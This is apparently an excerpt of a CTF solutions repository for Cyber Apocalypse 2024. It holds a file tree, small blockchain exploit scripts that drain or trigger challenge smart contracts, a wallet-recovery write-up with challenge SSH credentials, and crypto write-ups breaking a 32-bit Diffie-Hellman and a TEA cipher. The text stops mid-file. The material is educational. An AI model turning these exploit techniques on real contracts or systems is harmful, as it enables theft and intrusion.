├── README.md ├── assets ├── banner.png ├── htb.png └── logo_htb.png ├── blockchain ├── Lucky Faucet [Easy] │ ├── README.md │ └── htb │ │ └── solver.py ├── Recovery [Easy] │ ├── README.md │ └── assets │ │ ├── CA_banner.jpg │ │ ├── btc_sent.png │ │ ├── electrum_download.png │ │ ├── electrum_importseed.png │ │ ├── electrum_newwallet.png │ │ ├── electrum_server.png │ │ ├── flag.png │ │ ├── hacktheboo_banner.jpg │ │ ├── sending_btc_back.png │ │ ├── ssh_access.png │ │ └── stolen_bitcoin.png └── Russian Roulette [Very Easy] │ ├── README.md │ ├── assets │ └── CA_banner.jpg │ └── htb │ └── solver.py ├── crypto ├── [Easy] Blunt │ ├── README.md │ └── htb │ │ └── solve.sage ├── [Easy] Iced Tea │ ├── Makefile │ ├── README.md │ └── htb │ │ ├── output.txt │ │ └── solver.py ├── [Hard] Permuted │ ├── README.md │ └── htb │ │ ├── secret.py │ │ └── solve.py ├── [Hard] Tsayaki │ ├── Makefile │ ├── README.md │ └── htb │ │ ├── solver.py │ │ └── tea.py ├── [Insane] ROT128 │ ├── Makefile │ ├── README.md │ └── htb │ │ └── solver.sage ├── [Medium] Arranged │ ├── README.md │ └── htb │ │ └── solve.sage ├── [Medium] Partial Tenacity │ ├── Makefile │ ├── README.md │ └── htb │ │ ├── output.txt │ │ └── solver.py ├── [Very Easy] Dynastic │ ├── Makefile │ ├── README.md │ └── htb │ │ ├── output.txt │ │ └── solver.py ├── [Very Easy] Makeshift │ ├── README.md │ └── htb │ │ └── solve.py └── [Very Easy] Primary Knowledge │ ├── Makefile │ ├── README.md │ └── htb │ ├── output.txt │ └── solver.py ├── forensics ├── .gitkeep ├── [Easy] Fake Boost │ ├── Readme.md │ └── assets │ │ ├── banner.png │ │ ├── htb.png │ │ ├── writeup1.png │ │ ├── writeup2.png │ │ └── writeup3.png ├── [Easy] Persue The Tracks │ ├── README.md │ └── assets │ │ └── images │ │ ├── banner.png │ │ ├── htb.png │ │ ├── q1.png │ │ ├── q2.png │ │ ├── q3.png │ │ ├── q4.png │ │ ├── q5.png │ │ ├── q6.png │ │ ├── q7.png │ │ ├── q8.png │ │ └── q9.png ├── [Hard] Confinement │ ├── README.md │ └── assets │ │ ├── banner.png │ │ ├── chainsaw.png │ │ ├── 
cyberchef.png │ │ ├── decrypt-quarantine-file.png │ │ ├── decrypt.png │ │ ├── firstlook.png │ │ ├── flag.png │ │ ├── htb.png │ │ ├── intel-prefetch.png │ │ ├── intel-securitylog.png │ │ ├── log-quarantine.png │ │ ├── pwsh-command1.png │ │ ├── pwsh-command2.png │ │ ├── pwshlog.png │ │ ├── ransomnote.png │ │ ├── rev2.png │ │ ├── rev3.png │ │ └── rev4.png ├── [Hard] Game Invitation │ ├── README.md │ └── assets │ │ ├── banner.png │ │ ├── cyberchef.png │ │ ├── flag.png │ │ ├── htb.png │ │ ├── step_one.png │ │ ├── step_two.png │ │ └── step_two_beautified.png ├── [Insane] Oblique Final │ ├── Readme.md │ └── assets │ │ ├── banner.png │ │ ├── cor20.png │ │ ├── dnspy_debug_options.png │ │ ├── dotpeek.png │ │ ├── hexedit.png │ │ ├── htb.png │ │ ├── ilspy.png │ │ ├── r2r.png │ │ ├── shellcode_range.png │ │ └── tabs.png ├── [Medium] Data Siege │ ├── README.md │ └── assets │ │ └── images │ │ ├── banner.png │ │ └── htb.png ├── [Medium] Phreaky │ ├── Assets │ │ ├── Images │ │ │ ├── banner.png │ │ │ ├── example.png │ │ │ ├── htb.png │ │ │ └── shell.png │ │ ├── image-20240307210526796.png │ │ ├── image-20240307210539350.png │ │ ├── image-20240307210553102.png │ │ ├── image-20240307210648805.png │ │ ├── image-20240307210826562.png │ │ ├── image-20240307211242055.png │ │ ├── image-20240307211425321.png │ │ ├── image-20240307211518078.png │ │ ├── image-20240307211611787.png │ │ └── image-20240307211632474.png │ └── README.md ├── [Very Easy] An unusual sighting │ ├── README.md │ └── assets │ │ ├── banner.png │ │ └── htb.png ├── [Very Easy] It Has Begun │ ├── Readme.md │ └── assets │ │ ├── banner.png │ │ ├── htb.png │ │ └── image.png └── [Very Easy] Urgent │ ├── README.md │ └── assets │ ├── banner.png │ ├── conv.png │ ├── conv_full.png │ ├── cyberchef1.png │ ├── cyberchef2.png │ ├── flag.png │ ├── htb.png │ └── html.png ├── hw ├── BunnyPass [Very Easy] │ ├── README.md │ ├── assets │ │ ├── get_msg_1.png │ │ ├── get_msg_2.png │ │ ├── get_msg_3.png │ │ ├── loginpage.png │ │ ├── page_1.png │ 
│ ├── queues2.png │ │ └── rabbitmq.png │ └── entrypoint.sh ├── Flash-ing Logs [Hard] │ ├── README.md │ ├── assets │ │ ├── W25Q128.png │ │ ├── datahsheet_2.png │ │ ├── datasheet_1.png │ │ ├── datasheet_3_instructions.png │ │ ├── datasheet_3_instructions_2.png │ │ ├── flow_1.png │ │ ├── instruction_erase_sector.png │ │ ├── instruction_page_program.png │ │ ├── instruction_read.png │ │ ├── instruction_read_sec_reg.png │ │ ├── instruction_write_enable.png │ │ └── winbond.png │ └── htb │ │ └── solver.py ├── Maze [Very Easy] │ ├── Makefile │ ├── README.md │ └── assets │ │ └── image-20240314210808496.png ├── Rids [Easy] │ ├── README.md │ ├── assets │ │ ├── W25Q128.png │ │ ├── datahsheet_2.png │ │ ├── datasheet_1.png │ │ ├── instruction_read.png │ │ ├── read.png │ │ └── winbond.png │ └── htb │ │ └── solver.py └── The PROM [Medium] │ ├── README.md │ ├── assets │ ├── image-20240313172648964.png │ ├── image-20240313172820264.png │ ├── image-20240313172942389.png │ └── image-20240313173144008.png │ └── htb │ └── solver.py ├── misc ├── [Easy] Cubicle Riddle │ ├── README.md │ └── htb │ │ └── solver.py ├── [Easy] Unbreakable │ ├── README.md │ ├── assets │ │ ├── banner.png │ │ └── htb.png │ └── htb │ │ ├── main.py │ │ └── solver.py ├── [Easy] Were Pickle Phreaks │ ├── README.md │ └── htb │ │ └── sol.py ├── [Hard] MultiDigilingual │ ├── README.md │ └── htb │ │ └── sol.py ├── [Hard] Path of Survival │ ├── README.md │ ├── assets │ │ └── initial_view.png │ └── htb │ │ ├── consts_sol.py │ │ ├── game_sol.py │ │ ├── pathfinder_sol.py │ │ └── solve.py ├── [Medium] Colored Squares │ ├── Makefile │ ├── README.md │ └── htb │ │ └── solver.py ├── [Medium] Quantum Conundrum │ ├── README.md │ ├── assets │ │ └── image.png │ └── htb │ │ └── solver.py ├── [Medium] Were Pickle Phreaks Revenge │ ├── README.md │ └── htb │ │ └── sol.py ├── [Very Easy] Character │ ├── README.md │ └── htb │ │ └── solve.py └── [Very Easy] Stop Drop and Roll │ ├── README.md │ └── htb │ └── solve.py ├── pwn ├── [Easy] Pet 
companion │ ├── README.md │ ├── assets │ │ ├── banner.png │ │ └── htb.png │ └── htb │ │ └── solver.py ├── [Easy] Rocket Blaster XXX │ ├── README.md │ ├── assets │ │ ├── banner.png │ │ ├── htb.png │ │ └── inter.png │ └── htb │ │ └── solver.py ├── [Hard] Maze of Mist │ ├── README.md │ ├── assets │ │ └── symlink.png │ └── htb │ │ └── exploit.py ├── [Hard] Oracle │ ├── README.md │ └── htb │ │ └── exploit.py ├── [Insane] Gloater │ ├── README.md │ ├── assets │ │ └── initial_run.png │ └── htb │ │ └── exploit.py ├── [Medium] Death Note │ ├── README.md │ ├── assets │ │ ├── banner.png │ │ └── htb.png │ └── htb │ │ └── solver.py ├── [Medium] Sound of Silence │ ├── README.md │ ├── assets │ │ ├── banner.png │ │ └── htb.png │ └── htb │ │ └── solver.py ├── [Very Easy] Delulu │ ├── README.md │ ├── assets │ │ ├── banner.png │ │ ├── htb.png │ │ └── interface.png │ └── htb │ │ └── solver.py ├── [Very Easy] Tutorial │ ├── README.md │ ├── assets │ │ ├── banner.png │ │ ├── htb.png │ │ └── interface.png │ └── htb │ │ └── solver.py └── [Very Easy] Writing on the wall │ ├── README.md │ ├── assets │ ├── banner.png │ └── htb.png │ └── htb │ └── solver.py ├── reversing ├── [Easy] Crushing │ ├── README.md │ └── htb │ │ └── solve.py ├── [Hard] FlecksOfGold │ └── README.md ├── [Hard] Metagaming │ ├── README.md │ └── htb │ │ └── solve.py ├── [Insane] MazeOfPower │ ├── README.md │ ├── htb │ │ ├── go.mod │ │ ├── go.sum │ │ └── solve.go │ └── solve.py ├── [Medium] FollowThePath │ ├── README.md │ └── htb │ │ └── solve.py ├── [Medium] QuickScan │ ├── README.md │ └── htb │ │ └── solve.py ├── [Very Easy] BoxCutter │ └── README.md ├── [Very Easy] LootStash │ └── README.md └── [Very Easy] PackedAway │ ├── README.md │ └── assets │ ├── flag.png │ └── textbox.png └── web ├── [Easy] Labyrinth Linguist ├── README.md ├── assets │ └── overview.png ├── entrypoint.sh └── htb │ ├── flag.sh │ └── solver.py ├── [Easy] Testimonial ├── README.md ├── assets │ └── overview1.png ├── entrypoint.sh └── htb │ ├── 
solution.txt │ └── solver │ ├── .env │ ├── go.mod │ ├── go.sum │ ├── main.go │ ├── pb │ ├── ptypes.pb.go │ ├── ptypes.proto │ └── ptypes_grpc.pb.go │ └── pwn.go ├── [Hard] Percetron ├── .gitignore ├── README.md ├── assets │ ├── about.png │ ├── addcert.png │ ├── admin.png │ ├── certificates.png │ ├── home.png │ ├── hosts.png │ ├── login.png │ ├── management.png │ ├── op_msg.png │ ├── overview.png │ ├── register.png │ ├── smuggling.png │ ├── smuggling2.png │ └── solved.png ├── conf │ ├── haproxy.conf │ └── supervisord.conf ├── entrypoint.sh └── htb │ └── solver.py ├── [Insane] apexsurvive ├── assets │ ├── admhoem.png │ ├── afterverified.png │ ├── chrover.png │ ├── cook.png │ ├── csrfdone.png │ ├── cssexpl.png │ ├── email.png │ ├── flag.png │ ├── home.png │ ├── inbox.png │ ├── info.png │ ├── login.png │ ├── proadd.png │ └── product.png ├── bot │ └── app.py ├── email-app │ ├── index.js │ ├── package-lock.json │ ├── package.json │ ├── routes │ │ └── index.js │ ├── static │ │ ├── css │ │ │ └── bootstrap.min.css │ │ └── images │ │ │ └── LaughtPepe.gif │ └── views │ │ └── home.html ├── entrypoint.sh ├── htb │ ├── css_injection_csrf │ │ ├── css-exfiltrator-server.js │ │ ├── package-lock.json │ │ └── package.json │ ├── genPDF.py │ ├── payload.pdf │ ├── solver.py │ └── test.jpeg └── official_writeup.md ├── [Medium] LockTalk ├── README.md ├── assets │ └── .gitkeep ├── conf │ ├── haproxy.cfg │ ├── requirements.txt │ ├── supervisord.conf │ └── uwsgi.ini └── htb │ └── solver.py ├── [Medium] SerialFlow ├── README.md ├── assets │ ├── overview.png │ └── purple.png ├── conf │ └── supervisord.conf ├── entrypoint.sh └── htb │ └── solver.py ├── [Very Easy] Flag Command ├── assets │ ├── dev.png │ ├── flag.png │ ├── home.png │ └── res.png ├── htb │ └── solver.py └── official_writeup.md ├── [Very Easy] KORP Terminal ├── .gitignore ├── README.md ├── assets │ ├── dump.png │ ├── overview.png │ └── sqlmap.png ├── conf │ └── supervisord.conf ├── entrypoint.sh └── htb │ └── solver.py └── [Very 
Easy] TimeKORP ├── README.md ├── assets └── preview.png ├── flag └── htb └── solver.py /assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/assets/banner.png -------------------------------------------------------------------------------- /assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/assets/htb.png -------------------------------------------------------------------------------- /assets/logo_htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/assets/logo_htb.png -------------------------------------------------------------------------------- /blockchain/Lucky Faucet [Easy]/htb/solver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from os import system 3 | from pwn import remote, context, args 4 | 5 | context.log_level = "error" 6 | 7 | if args.REMOTE: 8 | ip = args.HOST 9 | rpc_port = args.RPC_PORT 10 | tcp_port = args.TCP_PORT 11 | RPC_URL = f"http://{ip}:{int(rpc_port)}/" 12 | TCP_URL = f"{ip}:{int(tcp_port)}" 13 | else: 14 | RPC_URL = "http://localhost:1337/" 15 | TCP_URL = "localhost:1338" 16 | 17 | if __name__ == "__main__": 18 | connection_info = {} 19 | 20 | # connect to challenge handler and get connection info 21 | with remote(TCP_URL.split(":")[0], int(TCP_URL.split(":")[1])) as p: 22 | p.sendlineafter(b"action? 
", b"1") 23 | data = p.recvall() 24 | 25 | lines = data.decode().split('\n') 26 | for line in lines: 27 | if line: 28 | key, value = line.strip().split(' : ') 29 | connection_info[key] = value 30 | 31 | print(connection_info) 32 | pvk = connection_info['Private key '] 33 | target = connection_info['Target contract'] 34 | 35 | system( 36 | f"cast send --rpc-url {RPC_URL} --private-key {pvk} {target} 'setBounds(int64,int64)' -- -2 -1" 37 | ) 38 | system( 39 | f"cast send {target} 'sendRandomETH()' --rpc-url {RPC_URL} --private-key {pvk}" 40 | ) 41 | 42 | # get flag 43 | with remote(TCP_URL.split(":")[0], int(TCP_URL.split(":")[1])) as p: 44 | p.recvuntil(b"action? ") 45 | p.sendline(b"3") 46 | flag = p.recvall().decode() 47 | 48 | print(f"\n\n[*] {flag}") 49 | -------------------------------------------------------------------------------- /blockchain/Recovery [Easy]/README.md: -------------------------------------------------------------------------------- 1 | ![img](../../../../../assets/banner.png) 2 | 3 | Recovery 4 | 5 | 28th 2022 / Document No. D22.102.16 6 | 7 | Prepared By: perrythepwner 8 | 9 | Challenge Author(s): perrythepwner 10 | 11 | Difficulty: Easy 12 | 13 | Classification: Official 14 | 15 | # Synopsis 16 | 17 | - The challenge involves recovering stolen BTC funds given an Electrum seed phrase in a hacked SSH instance. 18 | 19 | # Description 20 | 21 | - We are The Profits. During a hacking battle our infrastructure was compromised as were the private keys to our Bitcoin wallet that we kept. 22 | We managed to track the hacker and were able to get some SSH credentials into one of his personal cloud instances, can you try to recover my Bitcoins? 23 | - Username: satoshi 24 | - Password: L4mb0Pr0j3ct 25 | - NOTE: Network is regtest, check connection info in the handler first. 26 | 27 | # Skills Required 28 | 29 | - Basic research skills. 30 | 31 | # Skills Learned 32 | 33 | - Bitcoin wallets. 34 | - Bitcoin regtest network. 35 | - Wallet seed phrases. 
36 | - Electrum wallet setup & interaction. 37 | - Sending Bitcoins. 38 | 39 | # Enumeration 40 | 41 | We've been given access to an SSH instance with the credentials `satoshi:L4mb0Pr0j3ct`. Let's establish a connection and investigate the contents of the machine. 42 | 43 | ![SSH access](./assets/ssh_access.png) 44 | 45 | Once logged in, we'll notice a file named `electrum-wallet-seed.txt` in the home directory. Players can search for "electrum wallet seed" to find useful information: 46 | 47 | - [Electrum Seed Version System](https://electrum.readthedocs.io/en/latest/seedphrase.html) 48 | - [Restoring your standard wallet from seed - Bitcoin Electrum](https://bitcoinelectrum.com/restoring-your-standard-wallet-from-seed/) 49 | - [Creating an electrum wallet](https://bitcoinelectrum.com/creating-an-electrum-wallet/) 50 | 51 | These resources provide insights into Bitcoin wallets, how to create or load them, and details about BIP39. 52 | 53 | # Solution 54 | 55 | ## Wallet Recovery 56 | 57 | Now that we understand the concept of a seed and how Electrum wallets function, let's proceed with setting up the wallet client. 58 | 59 | 1. Install the Electrum wallet client. 60 | 61 | ![https://electrum.org/#download](./assets/electrum_download.png) 62 | 63 | 2. Start the client in `regtest` mode as suggested in the description. 64 | ![new](./assets/electrum_newwallet.png) 65 | 66 | 3. Choose the standard wallet option, and then enter the seed found in the SSH instance. 67 | ![import](./assets/electrum_importseed.png) 68 | 69 | 4. Switch the network to the Electrum server provided in order to connect to the blockchain.
70 | ![server](./assets/electrum_server.png) 71 | 72 | Alternatively, you can start Electrum with the correct server from the command line using the following syntax: 73 | ```bash 74 | ./electrum-4.4.6-x86_64.AppImage --regtest --oneserver -s 0.0.0.0:50001:t 75 | ``` 76 | 77 | ## Sending back the bitcoin 78 | 79 | Now it's time to initiate the actual request to retrieve our funds. 80 | 81 | 1. Connect to the Challenge Handler to obtain the address. 82 | ![](./assets/challenge_handler.png) 83 | 84 | 2. Return the Bitcoin to the provided address. 85 | ![](./assets/sending_btc_back.png) 86 | ![](./assets/btc_sent.png) 87 | 88 | ## Getting the flag 89 | 90 | We can connect to the netcat instance one final time and select the "1) Get flag" option. 91 | 92 | ![](./assets/flag.png) 93 | -------------------------------------------------------------------------------- /blockchain/Recovery [Easy]/assets/CA_banner.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Recovery [Easy]/assets/CA_banner.jpg -------------------------------------------------------------------------------- /blockchain/Recovery [Easy]/assets/btc_sent.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Recovery [Easy]/assets/btc_sent.png -------------------------------------------------------------------------------- /blockchain/Recovery [Easy]/assets/electrum_download.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Recovery [Easy]/assets/electrum_download.png -------------------------------------------------------------------------------- 
/blockchain/Recovery [Easy]/assets/electrum_importseed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Recovery [Easy]/assets/electrum_importseed.png -------------------------------------------------------------------------------- /blockchain/Recovery [Easy]/assets/electrum_newwallet.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Recovery [Easy]/assets/electrum_newwallet.png -------------------------------------------------------------------------------- /blockchain/Recovery [Easy]/assets/electrum_server.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Recovery [Easy]/assets/electrum_server.png -------------------------------------------------------------------------------- /blockchain/Recovery [Easy]/assets/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Recovery [Easy]/assets/flag.png -------------------------------------------------------------------------------- /blockchain/Recovery [Easy]/assets/hacktheboo_banner.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Recovery [Easy]/assets/hacktheboo_banner.jpg -------------------------------------------------------------------------------- /blockchain/Recovery [Easy]/assets/sending_btc_back.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Recovery [Easy]/assets/sending_btc_back.png -------------------------------------------------------------------------------- /blockchain/Recovery [Easy]/assets/ssh_access.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Recovery [Easy]/assets/ssh_access.png -------------------------------------------------------------------------------- /blockchain/Recovery [Easy]/assets/stolen_bitcoin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Recovery [Easy]/assets/stolen_bitcoin.png -------------------------------------------------------------------------------- /blockchain/Russian Roulette [Very Easy]/assets/CA_banner.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/blockchain/Russian Roulette [Very Easy]/assets/CA_banner.jpg -------------------------------------------------------------------------------- /blockchain/Russian Roulette [Very Easy]/htb/solver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from os import system 3 | from pwn import remote, context, args 4 | 5 | context.log_level = "error" 6 | 7 | if args.REMOTE: 8 | ip = args.HOST 9 | rpc_port = args.RPC_PORT 10 | tcp_port = args.TCP_PORT 11 | RPC_URL = f"http://{ip}:{int(rpc_port)}/" 12 | TCP_URL = f"{ip}:{int(tcp_port)}" 13 | else: 14 | RPC_URL = "http://localhost:1337/" 15 | TCP_URL = 
"localhost:1338" 16 | 17 | 18 | def csend(contract: str, fn: str, *args): 19 | print( 20 | f"cast send {contract} '{fn}' --rpc-url {RPC_URL} --private-key {pvk}") 21 | system( 22 | f"cast send {contract} '{fn}' --rpc-url {RPC_URL} --private-key {pvk}") 23 | 24 | 25 | if __name__ == "__main__": 26 | connection_info = {} 27 | 28 | # connect to challenge handler and get connection info 29 | with remote(TCP_URL.split(":")[0], int(TCP_URL.split(":")[1])) as p: 30 | p.sendlineafter(b"action? ", b"1") 31 | data = p.recvall() 32 | 33 | lines = data.decode().split('\n') 34 | for line in lines: 35 | if line: 36 | key, value = line.strip().split(' : ') 37 | connection_info[key] = value 38 | 39 | print(connection_info) 40 | pvk = connection_info['Private key '] 41 | setup = connection_info['Setup contract '] 42 | target = connection_info['Target contract'] 43 | 44 | while True: 45 | # try luck 46 | csend(target, "pullTrigger()") 47 | 48 | # get flag 49 | with remote(TCP_URL.split(":")[0], int(TCP_URL.split(":")[1])) as p: 50 | p.recvuntil(b"action? ") 51 | p.sendline(b"3") 52 | flag = p.recvall().decode() 53 | 54 | if "HTB" in flag: 55 | print(f"\n\n[*] {flag}") 56 | break 57 | -------------------------------------------------------------------------------- /crypto/[Easy] Blunt/README.md: -------------------------------------------------------------------------------- 1 | ![](../../../../../assets/banner.png) 2 | 3 | Blunt 4 | 5 | ​ 29th Jan 2024 / Document No. D24.102.27 6 | 7 | ​ Challenge Author(s): ir0nstone 8 | 9 | # Synopsis 10 | Blunt is an Easy crypto challenge that involves a small $p$ value, meaning it is easy to solve the DLP to retrieve the private exponents. 11 | 12 | ## Description: 13 | Valuing your life, you evade the other parties as much as you can, forsaking the piles of weaponry and the vantage points in favour of the depths of the jungle. As you jump through the trees and evade the traps lining the forest floor, a glint of metal catches your eye. 
Cautious, you creep around, careful not to trigger any sensors. Lying there is a knife - damaged and blunt, but a knife nonetheless. You’re not helpless any more. 14 | 15 | ## Skills Required 16 | - Basic understanding of the Diffie-Hellman Key Exchange 17 | 18 | ## Skills Learned 19 | - Solving the DLP in small groups 20 | - Using SageMath 21 | 22 | # Enumeration 23 | We are given the following script: 24 | ```py 25 | from Crypto.Cipher import AES 26 | from Crypto.Util.Padding import pad 27 | from Crypto.Util.number import getPrime, long_to_bytes 28 | from hashlib import sha256 29 | 30 | from secret import FLAG 31 | 32 | import random 33 | 34 | 35 | p = getPrime(32) 36 | print(f'p = 0x{p:x}') 37 | 38 | g = random.randint(1, p-1) 39 | print(f'g = 0x{g:x}') 40 | 41 | a = random.randint(1, p-1) 42 | b = random.randint(1, p-1) 43 | 44 | A, B = pow(g, a, p), pow(g, b, p) 45 | 46 | print(f'A = 0x{A:x}') 47 | print(f'B = 0x{B:x}') 48 | 49 | C = pow(A, b, p) 50 | assert C == pow(B, a, p) 51 | 52 | # now use it as shared secret 53 | hash = sha256() 54 | hash.update(long_to_bytes(C)) 55 | 56 | key = hash.digest()[:16] 57 | iv = b'\xc1V2\xe7\xed\xc7@8\xf9\\\xef\x80\xd7\x80L*' 58 | cipher = AES.new(key, AES.MODE_CBC, iv) 59 | 60 | encrypted = cipher.encrypt(pad(FLAG, 16)) 61 | print(f'ciphertext = {encrypted}') 62 | ``` 63 | 64 | This looks like a typical Diffie-Hellman Key Exchange: 65 | * A generator $g$ is defined in a finite field $F_p$ 66 | * The private exponents $a$ and $b$ are kept secret 67 | * $g$ is raised to the power of $a$ and $b$ to form $A$ and $B$ respectively 68 | * The values are exchanged (printed out) and then both sides raise the value they receive to their own private exponent to calculate $g^{ab}$ 69 | * This value is used as a shared secret for encryption 70 | 71 | The values are found in `output.txt`: 72 | ``` 73 | p = 0xdd6cc28d 74 | g = 0x83e21c05 75 | A = 0xcfabb6dd 76 | B = 0xc4a21ba9 77 | ciphertext =
b'\x94\x99\x01\xd1\xad\x95\xe0\x13\xb3\xacZj{\x97|z\x1a(&\xe8\x01\xe4Y\x08\xc4\xbeN\xcd\xb2*\xe6{' 78 | ``` 79 | 80 | # Solution 81 | The weakness here is the generation of the public prime number $p$: 82 | ```python 83 | p = getPrime(32) 84 | ``` 85 | We can see that $p$ is a 32-bit number - far too small to provide any security! We can calculate 86 | the private exponent $a$ by calculating the **discrete logarithm** of $A$ to the base $g$, which is easy since $p$ 87 | is so small: a generic algorithm such as baby-step giant-step needs only about $\sqrt{p} \approx 2^{16}$ group operations. We're going to use SageMath's `discrete_log` functionality to do this. 88 | 89 | ```python 90 | p = 0xdd6cc28d 91 | F = GF(p) 92 | 93 | g = F(0x83e21c05) 94 | A = F(0xcfabb6dd) 95 | B = F(0xc4a21ba9) 96 | ciphertext = b'\x94\x99\x01\xd1\xad\x95\xe0\x13\xb3\xacZj{\x97|z\x1a(&\xe8\x01\xe4Y\x08\xc4\xbeN\xcd\xb2*\xe6{' 97 | 98 | # get a, and from there C 99 | a = discrete_log(A, g) 100 | C = B^a 101 | ``` 102 | 103 | Once we've retrieved the shared secret $C$, the decryption is simple - it's basic AES decryption. 104 | 105 | ```python 106 | # decrypt 107 | hash = sha256() 108 | hash.update(long_to_bytes(int(C))) 109 | 110 | key = hash.digest()[:16] 111 | iv = b'\xc1V2\xe7\xed\xc7@8\xf9\\\xef\x80\xd7\x80L*' 112 | cipher = AES.new(key, AES.MODE_CBC, iv) 113 | 114 | decrypted = cipher.decrypt(ciphertext) 115 | flag = unpad(decrypted, 16) 116 | print(flag) 117 | ``` 118 | 119 | And we get the flag!
120 | -------------------------------------------------------------------------------- /crypto/[Easy] Blunt/htb/solve.sage: -------------------------------------------------------------------------------- 1 | from Crypto.Cipher import AES 2 | from Crypto.Util.number import long_to_bytes 3 | from Crypto.Util.Padding import unpad 4 | from hashlib import sha256 5 | 6 | p = 0xdd6cc28d 7 | F = GF(p) 8 | 9 | g = F(0x83e21c05) 10 | A = F(0xcfabb6dd) 11 | B = F(0xc4a21ba9) 12 | ciphertext = b'\x94\x99\x01\xd1\xad\x95\xe0\x13\xb3\xacZj{\x97|z\x1a(&\xe8\x01\xe4Y\x08\xc4\xbeN\xcd\xb2*\xe6{' 13 | 14 | # get a, and from there C 15 | a = discrete_log(A, g) 16 | C = B^a 17 | 18 | # decrypt 19 | hash = sha256() 20 | hash.update(long_to_bytes(int(C))) 21 | 22 | key = hash.digest()[:16] 23 | iv = b'\xc1V2\xe7\xed\xc7@8\xf9\\\xef\x80\xd7\x80L*' 24 | cipher = AES.new(key, AES.MODE_CBC, iv) 25 | 26 | decrypted = cipher.decrypt(ciphertext) 27 | flag = unpad(decrypted, 16) 28 | print(flag) -------------------------------------------------------------------------------- /crypto/[Easy] Iced Tea/Makefile: -------------------------------------------------------------------------------- 1 | default: 2 | ifdef name 3 | @cd challenge; \ 4 | python3 source.py; \ 5 | mkdir crypto_$(name); \ 6 | cp source.py output.txt ./crypto_$(name); \ 7 | cp output.txt ../htb/; \ 8 | mv ./crypto_$(name) ../release/; 9 | 10 | @cd release; \ 11 | zip -9 -r ./crypto_$(name).zip ./crypto_$(name); \ 12 | unzip -l ./crypto_$(name).zip; 13 | 14 | @echo [+] Challenge was built successfully. 15 | else 16 | @echo [-] Please define the challenge name. 
For example, \"make name=cool_chall_name\" 17 | endif 18 | 19 | flag: 20 | @echo [+] Flag : $$(cd challenge; python3 -c 'import secret; print(secret.FLAG.decode())') 21 | solver: 22 | @echo [+] PoC : $$(cd htb ; python3 solver.py) 23 | 24 | test: clean default flag solver 25 | 26 | clean: 27 | @rm -rf release/* 28 | @rm -rf htb/output.txt 29 | @echo [+] Challenge release deleted successfully. 30 | -------------------------------------------------------------------------------- /crypto/[Easy] Iced Tea/htb/output.txt: -------------------------------------------------------------------------------- 1 | Key : 850c1413787c389e0b34437a6828a1b2 2 | Ciphertext : b36c62d96d9daaa90634242e1e6c76556d020de35f7a3b248ed71351cc3f3da97d4d8fd0ebc5c06a655eb57f2b250dcb2b39c8b2000297f635ce4a44110ec66596c50624d6ab582b2fd92228a21ad9eece4729e589aba644393f57736a0b870308ff00d778214f238056b8cf5721a843 -------------------------------------------------------------------------------- /crypto/[Easy] Iced Tea/htb/solver.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import bytes_to_long as b2l, long_to_bytes as l2b 2 | from Crypto.Util.Padding import unpad 3 | 4 | DELTA = 0x9e3779b9 5 | 6 | def decrypt_block(key, ct): 7 | m0 = b2l(ct[:4]) 8 | m1 = b2l(ct[4:]) 9 | msk = (1 << 32) - 1 10 | 11 | s = 0xc6ef3720 12 | 13 | for i in range(32): 14 | m1 -= ((m0 << 4) + key[2]) ^ (m0 + s) ^ ((m0 >> 5) + key[3]) 15 | m1 &= msk 16 | m0 -= ((m1 << 4) + key[0]) ^ (m1 + s) ^ ((m1 >> 5) + key[1]) 17 | m0 &= msk 18 | s -= DELTA 19 | 20 | m = ((m0 << 32) + m1) & ((1 << 64) - 1) 21 | 22 | return l2b(m) 23 | 24 | def load_data(): 25 | with open('output.txt') as f: 26 | key = bytes.fromhex(f.readline().split(' : ')[1]) 27 | enc_flag = bytes.fromhex(f.readline().split(' : ')[1]) 28 | return key, enc_flag 29 | 30 | def 